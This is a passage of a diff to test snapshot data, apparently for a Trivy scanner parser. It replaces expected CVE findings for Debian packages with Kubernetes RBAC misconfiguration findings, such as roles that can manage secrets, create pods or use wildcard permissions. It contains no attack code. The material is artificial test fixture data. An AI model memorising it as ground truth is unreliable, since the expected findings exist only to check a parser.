"*"])", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-4116", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:bootstrap-signer", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/system:controller:cloud-provider' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:cloud-provider", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'system:controller:cloud-provider' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://seclists.org/oss-sec/2011/q4/238", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31486", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "foundIn": "Target: 'Role/system:controller:token-cleaner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://hackeriet.github.io/cpan-http-tiny-overview/", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - "https://www.openwall.com/lists/oss-security/2023/05/03/4", - "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, - "category": "Vulnerability", - "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:token-cleaner", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31486", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Role&Name=kubernetes-dashboard", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Role&Name=kubernetes-dashboard", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'kubernetes-dashboard' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Role/leader-election-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Role&Name=leader-election-role", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(Role 'leader-election-role' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV044", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv044", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits wildcard verb on wildcard resource", + "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", + "mitigation": "Create a role which does not permit wildcard verb on wildcard resource", + "name": "No wildcard verb and resource roles(Role permits wildcard verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "value": "https://avd.aquasec.com/misconfig/ksv044", }, { "type": "URL", - "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2005-2541", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", + "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - "https://access.redhat.com/security/cve/CVE-2005-2541", - "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", - "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", ], }, - "category": "Vulnerability", - "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-48303", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/errata/RHSA-2023:0959", - "https://access.redhat.com/security/cve/CVE-2022-48303", - "https://bugzilla.redhat.com/2149722", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", - "https://errata.almalinux.org/9/ALSA-2023-0959.html", - "https://errata.rockylinux.org/RLSA-2023:0959", - "https://linux.oracle.com/cve/CVE-2022-48303.html", - "https://linux.oracle.com/errata/ELSA-2023-0959.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", - "https://savannah.gnu.org/bugs/?62387", - "https://savannah.gnu.org/patch/?10307", - "https://ubuntu.com/security/notices/USN-5900-1", - "https://ubuntu.com/security/notices/USN-5900-2", - "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, - "category": "Vulnerability", - "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-48303", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0959", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-48303", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149722", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0959", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'admin' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", + ], + }, + "category": "Misconfiguration", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?62387", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://savannah.gnu.org/patch/?10307", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-1", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=admin", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-2", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1:1.2.11.dfsg-2+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-37434", - "installedVersion": "1:1.2.11.dfsg-2", - "packageName": "zlib1g", + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/37", - "http://seclists.org/fulldisclosure/2022/Oct/38", - "http://seclists.org/fulldisclosure/2022/Oct/41", - "http://seclists.org/fulldisclosure/2022/Oct/42", - "http://www.openwall.com/lists/oss-security/2022/08/05/2", - "http://www.openwall.com/lists/oss-security/2022/08/09/1", - "https://access.redhat.com/errata/RHSA-2022:8291", - "https://access.redhat.com/security/cve/CVE-2022-37434", - "https://bugzilla.redhat.com/2116639", - "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", - "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", - "https://errata.almalinux.org/9/ALSA-2022-8291.html", - "https://errata.rockylinux.org/RLSA-2022:8291", - "https://github.com/curl/curl/issues/9271", - "https://github.com/ivd38/zlib_overflow", - "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", - "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", - "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", - "https://linux.oracle.com/cve/CVE-2022-37434.html", - "https://linux.oracle.com/errata/ELSA-2023-1095.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "https://security.netapp.com/advisory/ntap-20220901-0005/", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://support.apple.com/kb/HT213488", - "https://support.apple.com/kb/HT213489", - "https://support.apple.com/kb/HT213490", - "https://support.apple.com/kb/HT213491", - "https://support.apple.com/kb/HT213493", - "https://support.apple.com/kb/HT213494", - "https://ubuntu.com/security/notices/USN-5570-1", - "https://ubuntu.com/security/notices/USN-5570-2", - "https://ubuntu.com/security/notices/USN-5573-1", - "https://www.cve.org/CVERecord?id=CVE-2022-37434", - "https://www.debian.org/security/2022/dsa-5218", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, - "category": "Vulnerability", - "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-37434", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/37", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/38", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - 